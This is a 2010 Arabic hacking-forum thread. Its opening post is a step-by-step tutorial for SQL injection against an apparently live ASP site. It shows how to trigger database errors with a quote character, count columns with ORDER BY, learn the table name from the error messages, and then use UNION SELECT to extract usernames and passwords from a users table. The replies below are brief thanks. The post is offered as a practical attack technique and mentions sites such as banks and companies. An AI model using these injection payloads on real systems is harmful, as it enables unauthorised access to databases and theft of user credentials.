شرح مبسط : استغلال ثغرات Asp باحتراف ..

KaLa$nikoV · 07-08-2010, 09:29 PM

السلام عليكم ورحمة الله وبركاته

اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن استغلال ثغرات asp ..
هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

انا ساشرج لكم على موقع www.haybersqlogretiyo.com

المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '
www.haybersqlogretiyo.com/baskabibolum.asp?id=10"

يظهر لنا الخطأ التالى :

كود PHP:

   Microsoft JET Database Engine error ’80040e14’  
Syntax error in string in query expression ’id = 10";’.  
/baskabirbolum.asp, line 7

لان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
http://www.haybersqlogretiyo.com/bas...=10+order+by+1

الان عند الوصول الى العمود المصاب وهو 10
http://www.haybersqlogretiyo.com/bas...10+order+by+10
يظهر الخطأ التالى :

كود PHP:

   Microsoft JET Database Engine error ’80040e14’  
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.  
/news.asp, line 7

ويكون العمود المصاب الرقم 8
http://www.haybersqlogretiyo.com/bas...=10+order+by+8

http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7--

الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة

كود PHP:

     Microsoft JET Database Engine error ’80040e37’  
The Microsoft Jet database engine cannot find the input table or query ’hayber’. Make sure it exists and that its name is spelled correctly.  
/baskabirbolum.asp, line 7

واسمها : hayber

ويتم استغلالها .
http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7+from+hayber

والان نظهر اسم اليوزر والباس
http://www.haybersqlogretiyo.com/bas...0,username,pas sword,3,4,5,6,7+from+users

تحياتي

اقتباس


	منقول عن قراصنه نابلس Mr.X

المصدر: :: vBspiders Professional Network ::

avp lfs' : hsjyghg eyvhj Asp fhpjvht >>

Zero · 07-08-2010, 09:34 PM

[align=center][align=center]احسن نقلة ياعم فولكانو مشكووور [/align][/align]

NeTCaT-Ma · 07-08-2010, 09:57 PM

مشكوووور يامعلم بارك الله فيك

z3r0 b0mb3r · 07-08-2010, 11:16 PM

شكرا لك يائخي الي الامام

TheGame · 07-09-2010, 04:33 AM

مشكور فولوكانو بارك الله بيك بس ياريت لو تعملنه شرح فيديو وبارك الله فيك

KALASH3R · 08-10-2010, 04:03 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

NickelbackII · 09-06-2011, 02:41 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

bilalo100 · 09-06-2011, 04:05 PM

مشكور فولوكانو بارك الله بيك

hacker2020 · 09-08-2011, 12:04 PM

شكرأ

دام علاء العماد · 09-17-2011, 06:58 AM

بارك الله فيك يا أخي الكريم ، و جزاك الله عنا خير الجزاء

wolio · 10-21-2013, 05:16 AM

مشكوووووووووووووووووووووووووووووووور

islambou · 12-09-2013, 12:57 AM

مشكور بارك الله فيك

الديلر الفلسطيني · 01-04-2014, 05:34 PM

واصل

Wawi alBasrah · 12-11-2014, 01:50 PM

احسنت اخي جهد رائع

wwwamriki · 12-12-2014, 02:58 PM

تسلم ايديك

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
][الدرس الثالث استغلال ثغرات المتصفح][	DR.THMoORY	قســم إختــراق الأجهــزة	255	10-27-2011 01:33 AM
استغلال ثغرات الـ c o o k i es Handling Vulnerability	Red-D3v1L	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	4	02-01-2011 08:46 AM
كيف يمكن استغلال ثغرات man.sh meta.pl bb-hist.sh	killer-32	جـــ'ابات العناكــ'ب	12	12-03-2009 11:02 PM
كيف يمكن استغلال ثغرات man.sh meta.pl bb-hist.sh	killer-32	جـــ'ابات العناكــ'ب	2	12-01-2009 03:56 PM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

شرح مبسط : استغلال ثغرات Asp باحتراف ..

SQL قواعد البيانات